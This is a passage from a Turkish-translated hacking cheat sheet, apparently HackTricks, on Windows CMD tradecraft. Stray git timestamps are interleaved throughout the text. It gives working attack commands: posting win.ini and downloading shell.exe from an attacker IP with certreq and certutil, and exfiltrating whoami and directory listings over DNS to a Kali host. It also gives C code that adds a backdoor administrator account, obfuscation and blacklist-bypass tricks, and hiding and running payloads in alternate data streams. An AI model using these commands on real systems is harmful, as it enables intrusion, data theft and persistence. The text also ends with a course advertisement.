* **certreq -new**: Generates a new certificate request based on the information provided in an input file.
* **certreq -submit**: Submits a certificate request to a CA for processing.
* **certreq -retrieve**: Retrieves a certificate issued by a CA.
* **certreq -accept**: Installs a certificate into the local certificate store.
* **certreq -export**: Exports a certificate to a file.
* **certreq -delete**: Deletes a certificate from the local certificate store.
2020-09-07 11:12:11 +00:00
2024-02-10 18:14:16 +00:00
These are just a few examples of the commands that can be used with CertReq.exe. The tool offers many more options and functionalities, which can be explored by referring to the official documentation or by using the **certreq -?** command to display the help menu.
CertReq.exe is a powerful tool that can be leveraged by pentesters and security professionals during various stages of a penetration test or security assessment. It provides a convenient way to manage certificates and interact with CAs in a Windows environment.
2024-04-06 19:40:41 +00:00
2022-05-17 09:34:10 +00:00
```
2020-09-05 18:55:40 +00:00
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
`Certutil.exe` is a command-line utility in Windows that is used to manage certificates. It can be used to perform various operations such as installing, exporting, and verifying certificates. Here are some common commands that can be used with `certutil.exe` :
2024-04-06 19:40:41 +00:00
* **View certificate details**: `certutil -viewstore <store_name>`
* **Install a certificate**: `certutil -addstore <store_name> <certificate_file>`
* **Export a certificate**: `certutil -exportPFX -p <password> <certificate_thumbprint> <pfx_file>`
* **Verify a certificate**: `certutil -verify <certificate_file>`
* **Delete a certificate**: `certutil -delstore <store_name> <certificate_thumbprint>`
2020-09-05 18:55:40 +00:00
2024-02-10 18:14:16 +00:00
Note: Replace `<store_name>` with the name of the certificate store (e.g., `Root` , `My` , `CA` ), `<certificate_file>` with the path to the certificate file, `<certificate_thumbprint>` with the thumbprint of the certificate, and `<pfx_file>` with the path to the PFX file.
2020-09-07 11:12:11 +00:00
2024-02-10 18:14:16 +00:00
For more information and additional commands, you can refer to the [Microsoft documentation ](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil ).
2024-04-06 19:40:41 +00:00
2022-05-17 09:34:10 +00:00
```
2020-09-05 18:55:40 +00:00
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
```
2024-04-06 19:40:41 +00:00
**Daha fazlası nı bulmak için** [**https://lolbas-project.github.io** ](https://lolbas-project.github.io/ ) **adresinde `Download` kelimesini arayı n.**
2020-09-05 18:55:40 +00:00
2024-02-10 18:14:16 +00:00
## Çeşitli
2024-04-06 19:40:41 +00:00
2020-07-15 15:43:14 +00:00
```bash
cd #Get current dir
cd C:\path\to\dir #Change dir
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive list without shit
time #Get current time
date #Get current date
shutdown /r /t 0 #Shutdown now
type < file > #Cat file
2020-09-07 11:12:11 +00:00
2020-07-15 15:43:14 +00:00
#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
2021-03-18 23:05:52 +00:00
runas /netonly /user:< DOMAIN > \<NAME> "cmd.exe" ::The password will be prompted
2020-07-15 15:43:14 +00:00
#Hide
attrib +h file #Set Hidden
attrib -h file #Quit Hidden
#Give full control over a file that you owns
icacls < FILE_PATH > /t /e /p < USERNAME > :F
icacls < FILE_PATH > /e /r < USERNAME > #Remove the permision
#Recursive copy to smb
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
#exe2bat to transform exe file in bat file
#ADS
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)
2022-08-13 13:54:19 +00:00
# Get error messages from code
net helpmsg 32 #32 is the code in that case
2020-07-15 15:43:14 +00:00
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
### Karakter Kara Listesini Atlama
Bazı durumlarda, hedef sistemdeki bir uygulama veya güvenlik mekanizması , belirli karakterleri engellemek için bir kara liste kullanabilir. Ancak, bu kara listeyi atlamanı n yolları vardı r. İşte bazı yöntemler:
#### 1. Karakterleri Değiştirme
Engellenen karakterleri, benzer görünümlü başka karakterlerle değiştirebilirsiniz. Örneğin, "a" harfini "4" ile değiştirebilirsiniz. Bu şekilde, engellenen karakteri kullanmadan hedef sisteme giriş yapabilirsiniz.
#### 2. Karakterleri Kodlama
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
Engellenen karakterleri, kodlama teknikleri kullanarak atlatabilirsiniz. Örneğin, URL kodlaması veya Unicode kodlaması gibi yöntemlerle karakterleri değiştirerek engellemeyi aşabilirsiniz.
2022-10-02 21:44:11 +00:00
2024-02-10 18:14:16 +00:00
#### 3. Karakterleri Parçalama
Engellenen karakterleri parçalayarak, hedef sisteme giriş yapabilirsiniz. Örneğin, "admin" kelimesini "a d m i n" olarak yazabilirsiniz. Bu şekilde, engellenen karakterleri kullanmadan hedef sisteme erişebilirsiniz.
#### 4. Karakterleri Atlatma
Engellenen karakterleri tamamen atlayarak, hedef sisteme giriş yapabilirsiniz. Örneğin, bir komut dosyası veya araç kullanarak engellenen karakterleri otomatik olarak atlayabilirsiniz.
Bu yöntemler, karakter kara listesini atlamanı za yardı mcı olabilir. Ancak, her durumda etkili olmayabilir. Bu nedenle, hedef sistemi ve engelleme mekanizması nı dikkatlice analiz etmek önemlidir.
2024-04-06 19:40:41 +00:00
2022-10-02 21:44:11 +00:00
```bash
2022-10-02 22:00:14 +00:00
echo %HOMEPATH:~6,-11% #\
who^ami #whoami
```
2024-04-06 19:40:41 +00:00
2022-10-02 22:00:14 +00:00
### DOSfuscation
2024-02-10 18:14:16 +00:00
Obfuscated CMD satı rı oluşturur.
2024-04-06 19:40:41 +00:00
2022-10-02 22:00:14 +00:00
```powershell
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding
2022-10-02 21:44:11 +00:00
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
### Dinleme adresi ACL'leri
2022-10-02 21:44:11 +00:00
2024-02-10 18:14:16 +00:00
Yönetici olmadan [http://+:80/Temporary\_Listen\_Addresses/ ](http://+/Temporary\_Listen\_Addresses/ ) üzerinde dinleyebilirsiniz.
2024-04-06 19:40:41 +00:00
2020-07-15 15:43:14 +00:00
```bash
netsh http show urlacl
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
### Manuel DNS kabuğu
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
**Saldı rgan** (Kali), aşağı daki 2 seçenekten birini kullanmalı dı r:
2024-04-06 19:40:41 +00:00
2020-07-15 15:43:14 +00:00
```bash
sudo responder -I < iface > #Active
2020-09-07 11:12:11 +00:00
sudo tcpdump -i < iface > -A proto udp and dst port 53 and dst ip < KALI_IP > #Passive
2020-07-15 15:43:14 +00:00
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
#### Hedef
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
**`for /f tokens`** tekniği: Bu bize komutları yürütmeyi, her satı rı n ilk X kelimesini almayı ve bunu DNS üzerinden sunucumuza göndermeyi sağlar.
2024-04-06 19:40:41 +00:00
2024-02-08 03:08:28 +00:00
```bash
2020-07-15 15:43:14 +00:00
for /f %a in ('whoami') do nslookup %a < IP_kali > #Get whoami
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a < IP_kali > #Get word2
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c < IP_kali > #List folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c < IP_kali > #List that folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c < IP_kali > #Same as last one
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i < IP_kali > #Same as last one
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
Ayrı ca çı ktı yı **yönlendirebilir** ve ardı ndan **okuyabilirsiniz** .
2024-04-06 19:40:41 +00:00
2022-05-17 09:34:10 +00:00
```
2020-07-15 15:43:14 +00:00
whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i < IP_kali >
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
## C kodundan CMD'yi çağı rmak
CMD'yi C kodundan çağı rmak için `system()` fonksiyonunu kullanabilirsiniz. Bu fonksiyon, bir komutu çalı ştı rmak için işletim sistemi kabuğunu çağı rı r.
```c
#include <stdlib.h>
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
int main() {
system("komut");
return 0;
}
```
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
Yukarı daki örnekte, `"komut"` yerine çalı ştı rmak istediğiniz CMD komutunu belirtmelisiniz. Bu şekilde, C kodunuz CMD'yi çağı rarak belirtilen komutu çalı ştı racaktı r.
2024-04-06 19:40:41 +00:00
2020-07-15 15:43:14 +00:00
```c
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
// When executed by Administrator this program will create a user and then add him to the administrators group
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe
int main (){
2024-02-10 18:14:16 +00:00
int i;
i=system("net users otherAcc 0TherAcc! /add");
i=system("net localgroup administrators otherAcc /add");
return 0;
2020-07-15 15:43:14 +00:00
}
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
## Alternatif Veri Akı şları Hile Sayfası (ADS/Alternatif Veri Akı şı )
2020-07-15 15:43:14 +00:00
2024-04-06 19:40:41 +00:00
**Örnekler** [**https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f** ](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f ) **adresinden alı nmı ştı r. Orada daha fazla örnek bulunmaktadı r!**
2020-07-15 15:43:14 +00:00
```bash
2024-02-05 02:29:11 +00:00
## Selected Examples of ADS Operations ##
### Adding Content to ADS ###
# Append executable to a log file as an ADS
2020-07-15 15:43:14 +00:00
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
2024-02-05 02:29:11 +00:00
# Download a script directly into an ADS
2020-07-15 15:43:14 +00:00
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
2024-02-05 02:29:11 +00:00
### Discovering ADS Content ###
# List files and their ADS
dir /R
# Use Sysinternals tool to list ADS of a file
streams.exe < c: \path \to \file >
2020-07-15 15:43:14 +00:00
2024-02-05 02:29:11 +00:00
### Extracting Content from ADS ###
# Extract an executable stored in an ADS
expand c:\ads\file.txt:test.exe c:\temp\evil.exe
2020-07-15 15:43:14 +00:00
2024-02-05 02:29:11 +00:00
### Executing ADS Content ###
# Execute an executable stored in an ADS using WMIC
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
# Execute a script stored in an ADS using PowerShell
2020-07-15 15:43:14 +00:00
powershell -ep bypass - < c: \temp:ttt
```
2024-04-06 19:40:41 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-02-10 18:14:16 +00:00
< summary > < strong > AWS hackleme becerilerini sı fı rdan kahraman seviyesine öğrenin< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Kı rmı zı Takı m Uzmanı )< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
* Bir **cybersecurity şirketinde mi çalı şı yorsunuz** ? **Şirketinizi HackTricks'te reklamı nı görmek** ister misiniz? veya **PEASS'ı n en son sürümüne veya HackTricks'i PDF olarak indirmek** ister misiniz? [**ABONELİK PLANLARINI** ](https://github.com/sponsors/carlospolop ) kontrol edin!
* [**The PEASS Ailesi'ni** ](https://opensea.io/collection/the-peass-family ), özel [**NFT'lerimiz** ](https://opensea.io/collection/the-peass-family ) koleksiyonunu keşfedin.
* [**Resmi PEASS & HackTricks ürünlerini** ](https://peass.creator-spring.com ) edinin.
2024-04-06 19:40:41 +00:00
* [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) **katı lı n** veya **Twitter** 'da beni takip edin 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
2024-02-10 18:14:16 +00:00
* **Hacking hilelerinizi** [**hacktricks repo** ](https://github.com/carlospolop/hacktricks ) **ve** [**hacktricks-cloud repo** ](https://github.com/carlospolop/hacktricks-cloud ) **ile göndererek paylaşı n.**
2022-04-28 16:01:33 +00:00
< / details >